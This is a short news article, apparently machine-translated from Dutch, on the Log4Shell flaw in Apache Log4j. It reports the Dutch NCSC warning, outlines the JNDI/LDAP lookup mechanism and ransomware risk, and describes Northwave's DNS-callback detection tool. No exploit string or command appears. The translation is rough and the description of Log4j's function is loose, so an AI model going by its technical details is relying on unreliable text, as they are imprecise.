Subscribe to Techzine for free!
–
The National Cyber Security Center (NCSC) warns of a highly critical vulnerability for Apache Log4j software for web servers. This vulnerability makes it possible to penetrate networks and carry out ransomware attacks. A patch is now available.
From Vulnerability found in Apache Log4j software (CVE-2021-44228), which has since been renamed Log4shell, makes it possible to compromise permissions for web servers. The attacked software makes it possible, among other things, to register which usernames log on to websites and when.
Hackmethode
The hack is caused because the JNDI properties in configuration settings, log files and parameters do not protect against hacker-controlled LDAP and other JNDI related endpoints. This makes it easy for hackers to take over the log files or parameters of these files remotely and then distribute code via LDAP servers when the so-called message lookup is turned on.
Ransomware easy to spread
This makes it easy for hackers to spread ransomware and attack networks. According to experts, it is very likely that hackers are now present in company networks via this hacking method and a wave of ransomware attacks can be expected.
The Dutch cyber watchdog informs companies to be very alert to the vulnerability found. The NCSC has concluded that the hacking method is already active in the Netherlands. We are urged to install Apache patches as soon as possible.
Detection tool
Cybersecurity specialist Northwave has now a detection tool developed to allow companies to discover the vulnerability in Apache Log4j. This tool checks for vulnerable systems that use payload injection into the User-Agent header as part of an HTTP GET request. It looks for incoming DNS requests with a specially created UUID. Rather than deploying an LDAP server, looking at inbound DNS traffic is more likely to discover vulnerable systems that have outbound filtering turned on. Outgoing DNS traffic is often allowed, as practice shows.
The Northwave specialists do issue an important disclaimer with the tool. Their tool only checks User Agent and HTTP GET. This may cause false positives in cases where other headers, more specifically including input fields, need to be targeted as part of an HTTP GET request. In these cases, the security experts recommend performing other checks.
–
–
:quality(70):focal(1964x1747:1974x1757)/cloudfront-eu-central-1.images.arcpublishing.com/liberation/XHRYM5D6FFE25OK5Y7DR2P3VZE.jpg?resize=150%2C150&ssl=1)
